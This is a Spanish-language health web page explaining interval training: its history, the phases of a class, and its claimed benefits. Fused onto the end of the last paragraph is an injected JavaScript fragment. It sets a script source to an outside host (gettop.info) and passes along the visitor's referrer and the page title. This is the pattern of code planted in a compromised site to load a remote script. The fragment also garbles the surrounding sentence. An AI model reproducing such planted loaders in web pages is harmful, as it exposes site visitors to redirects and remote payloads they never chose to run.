Salud y belleza » Deportes

¿Qué es el Interval Training?

Sin Comentarios

Interval Training, para develar la incógnita del enunciado, es una de las formas más utilizadas por estos días para entrar el cuerpo y, por qué no, el espíritu. El IT es, en efecto, tal como su nombre lo indica, un sistema interválico que consiste básicamente en alternar períodos cortos de esfuerzo intenso con otros de descanso.

Es una antigua práctica desarrollada en Alemania allá por la década del cincuenta que, como tantas otras viejas rutinas, hoy se recicla y se vuelve a utilizar.

“Cada vez son más los gimnasios que cuentan con sesiones de Interval Training. Esto se debe principalmente a la facilidad de éste deporte para combinar ejercicios aeróbicos con labores de tonificación. Estamos ante un modelo de entrenamiento intensivo capaz de proporcionar mejores resultados en cuanto a mejora de la capacidad cardiovascular y resistencia corporales que muchos otros deportes. No es casualidad que cada vez sea mayor el número de individuos que se vuelca a este tipo de practicas en lugar de otros convencionales, pasadas de moda, obsoletas” señala un profesional del IT.

¿Cómo es una clase de Interval Training? Así…

  1. Entrada en calor (lapso de quince minutos): estiramiento y ejercicios livianos.
  2. Labor interválica (casi una hora): aquí, en el ejercicio propiamente dicho, se fraccionará el tiempo en varios intervalos dónde se irá intercalando el trabajo intensivo, agotador, con el descanso.
  3. Trabajos intensivos (repetidas series de un minuto o dos): su nombre lo indicia, se trata un trabajo aeróbico de alta intensidad.
  4. Período de descanso o recuperación: el momento ideal para bajar pulsaciones y recuperar el cuerpo del esfuerzo antes realizado. En cada uno de los descansos o recreos se trabajará un grupo muscular diferente para conseguir un trabajo físico más completo.

El Interval Training se presenta como un trabajo cíclico: calentamiento, intervalos, trabajos duros, descansos, etc.

¿Cuáles son los beneficios de practicar Interval Training?

El IT ayudar a mejorar la resistencia física; fomenta la capacidad aeróbica y respiratoria del individuo; previene enfermedades (sobretodo las del corazón); tonifica los músculos; ayuda a quemar calorías y grasas; es un buen método para bajar los niveles de estrés y mucho, pero mucho, más.

Tal como se aprecia, el Interval Training es un gran modo de hacer ejercicio. Es apto para casi todo tipo de personas sin importar sexo o edad y, para practicarlo, solo se deben tener en cuenta ciertos aspectos tales como el control de la intensidad, la hidratación y, por supuesto, las ganas.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.